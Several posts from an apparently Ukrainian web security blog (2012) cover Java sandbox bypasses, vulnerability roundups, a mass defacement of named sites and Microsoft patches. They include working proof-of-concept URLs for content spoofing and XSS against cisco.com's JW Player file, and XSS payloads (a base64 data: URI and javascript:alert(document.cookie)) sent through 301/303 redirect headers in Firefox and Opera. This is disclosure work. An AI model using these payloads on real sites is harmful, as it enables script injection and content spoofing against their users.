Websecurity - Веб безпека

Виявлена можливість обходу обмежень обмеженого середовища (sandbox) в Java.

Уразливі продукти: Oracle JDK 7, JRE 7.

Існує кілька способів обходу обмежень і виконання привілейованого коду з аплета.

• New security issue affecting Java SE 7 Update 7 (деталі)
• Oracle Java 7 Security Manager Bypass Vulnerability (деталі)
• Information regarding recently discovered Java 7 attack (деталі)

В даній добірці уразливості в веб додатках:

• HP OpenView Performance Agent coda.exe Opcode 0×8C Remote Code Execution Vulnerability (деталі)
• XSS Vulnerabilities in LabWiki (деталі)
• XSS and SQL Injection Vulnerabilities in Jara (деталі)
• SaltOS 3.1 Cross-Site Scripting vulnerability (деталі)
• HP OpenView Performance Agent coda.exe Opcode 0×34 Remote Code Execution Vulnerability (деталі)
• Ad Manager Pro v. 4 Remote FLI (деталі)
• Vulnerabilities in python-django (деталі)
• Elcom CMS - Community Manager Insecure File Upload Vulnerability (деталі)
• HP Operations Agent for AIX, HP-UX, Linux, Solaris and Windows, Remote Execution of Arbitrary Code (деталі)
• Magy cms v 2.0.1121 BETA Blind Sql injection (деталі)

У січні, 07.01.2012, я знайшов нові уразливості на сайті http://www.cisco.com. Це Content Spoofing та Cross-Site Scripting уразливості і вони мають місце в JW Player та в JW Player Pro, про які я писав раніше. Мало того, що Cisco роками тримає ці дірки в себе на сайті та ще й пройшло чимало часу після того, як я оприлюднив дірки в JW Player (а пізніше й в JW Player Pro), але вони до сих пір не виправили їх в себе на сайті.

Раніше я вже писав про уразливості на www.cisco.com.

Content Spoofing:

http://www.cisco.com/assets/swa/flash/mediaplayer/jw4.swf?config=http://site/1.xml
http://www.cisco.com/assets/swa/flash/mediaplayer/jw4.swf?file=http://site/1.flv&image=http://site/1.jpg
http://www.cisco.com/assets/swa/flash/mediaplayer/jw4.swf?abouttext=Player&aboutlink=http://site

При підключенні плагіна captions також можна проводити CS атаку через параметр captions.file.

XSS:

• alert(document.cookie)
• цікавий

У липні, 06.07.2012, відбувся масовий взлом сайтів на сервері Hetzner Online AG. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер німецької компанії Hetzner Online AG, на якому хостилися українські сайти. Взлом відбулася після згаданого масового взлому сайтів на сервері Adamant.

Всього було взломано 24 сайти на сервері компанії Hetzner Online (IP 176.9.90.197). Це наступні сайти: kprda.arsana.com.ua, catalog.novini.net.ua, dopros.arsana.com.ua, eljuris.arsana.com.ua, iren.arsana.com.ua, lawonline.arsana.com.ua, lesya.arsana.com.ua, stezhkami.arsana.com.ua, all.arsana.com.ua, portatemporis.com, daniloviko.com.ua, lesiapylypchuk.com.ua, nachasi.com.ua, novini.net.ua, polimet.km.ua, vip-info.com.ua, zabava-tour.com, kprda.gov.ua, portatempus.com, arsana.com.ua, fishka-shop.com, wellkamianets.com.ua, eljuris.com.ua, pererojdenie.info. Серед них український державний сайт kprda.gov.ua. Це черговий державний сайт, що хоститься закордоном.

Всі 24 сайти були взломані хакером nO lOv3 на протязі одного дня.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх 24 сайтів, то вони могли бути атаковані хакером nO lOv3 через взлом серверу хостінг провайдера. Коли через взлом одного сайта, через уразливості в програмному забезпеченні самого сервера, атаковані інші сайти на даному сервері. Або вони могли бути атаковані через взлом одного сайта та подальшого взлому всіх сайтів в акаунті.

В презентації Web Application Security Tutorial, Neil Matatall наводить навчальний посібник з безпеки веб додатків. Він розповідає про ризики уразливостей у веб додатках та про необхідність слідкувати за їх безпекою. Подібні посібники сприяють навчанню веб розробників та власників сайтів основам безпеки.

Виявлені численні уразливості безпеки в Apple Safari, WebKit, Google Chrome.

Уразливі продукти: Apple Safari 6.0, WebKit, Google Chrome 20.0.

Витік інформації, пошкодження пам’яті.

• APPLE-SA-2012-09-19-3 Safari 6.0.1 (деталі)

У вересні, 16.09.2012, коли я виявив, що Mozilla приховано виправила два вектори атаки через редиректори (зі статусом 302), про які я розповідав в 2009 році в своїх адвізорі та статті Cross-Site Scripting атаки через редиректори, я також звернув увагу, що деякі XSS атаки працюють і при інших статусах. Тому я вирішив перевірити різні браузери на предмет XSS атак через редиректори з кодами статусу 301 і 303. Раніше я дослідив тільки refresh-редиректори і 302 location-редиректори (а 301 редиректори дослідив лише в атаці №3 через data: URI), а зараз вирішив доповнити це дослідження новою інформацією.

І я виявив Cross-Site Scripting уразливості в браузерах Mozilla Firefox та Opera. Атака відбувається через заголовок location при статусах 301 і 303. Браузери IE6, IE7, IE8 та Chrome невразливі. Атаки через інші 30x статуси не працюють.

Атака №1:

При запиті до скрипта на сайті:
http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
Що поверне у відповіді 301 код:

HTTP/1.1 301 Moved Permanently
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Або поверне у відповіді 303 код:

HTTP/1.1 303 See other
Location: data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Атака працює в Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 та Opera 10.62 без доступу до кукісів.

Атака №2:

При запиті до скрипта на сайті:
http://site/script.php?param=javascript:alert(document.cookie)
Що поверне у відповіді 301 код:
HTTP/1.1 301 Moved Permanently
Location: javascript:alert(document.cookie)
Або поверне у відповіді 303 код:
HTTP/1.1 303 See other
Location: javascript:alert(document.cookie)

Атака працює в Opera 10.62 (як Strictly social XSS) без доступу до кукісів.

У вересні місяці Microsoft випустила 2 патчі. Що менше ніж у серпні.

У вересневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 2 бюлетені по безпеці. Що закривають 2 уразливості в програмних продуктах компанії (що значно менше ніж минулого місяця). Обидва патчі закривають некритичні уразливості - XSS дірки в серверних продуктах.

Але вже після вівторка патчів, Microsoft випустила кумулятивне виправлення для Internet Explorer. Тому двома патчами в цьому місяці не обійшлося.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7 та 2008 R2. А також Visual Studio Team Foundation Server, System Center Configuration Manager та Internet Explorer.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://connected.dn.ua - інфекція була виявлена 20.07.2012. Зараз сайт входить до переліку підозрілих.
• http://sanatoriitruskavca.com - інфекція була виявлена 27.06.2012. Зараз сайт не входить до переліку підозрілих.
• http://olenchinkova.com - інфекція була виявлена 26.08.2012. Зараз сайт не входить до переліку підозрілих.
• http://ukrwest.com.ua - інфекція була виявлена 04.07.2012. Зараз сайт не входить до переліку підозрілих.
• http://ukrzahid.com.ua - інфекція була виявлена 01.07.2012. Зараз сайт не входить до переліку підозрілих.

В даній добірці уразливості в веб додатках:

• Western Digital ShareSpace WEB GUI Sensitive Data Disclosure (деталі)
• Squiz CMS Directory Traversal (деталі)
• Moodle CMS stored XSS (деталі)
• SysAid Helpdesk blind SQL injection (деталі)
• Cross-site scripting vulnerability in Mono (деталі)
• SysAid Helpdesk stored XSS (деталі)
• apache struts2 remote code execute (деталі)
• XSS and Blind SQL Injection Vulnerabilities in Banana Dance CMS (деталі)
• IBM Edge Components Caching Proxy XSS Followup (деталі)
• XSS and SQL Injection Vulnerabilities in OrderSys (деталі)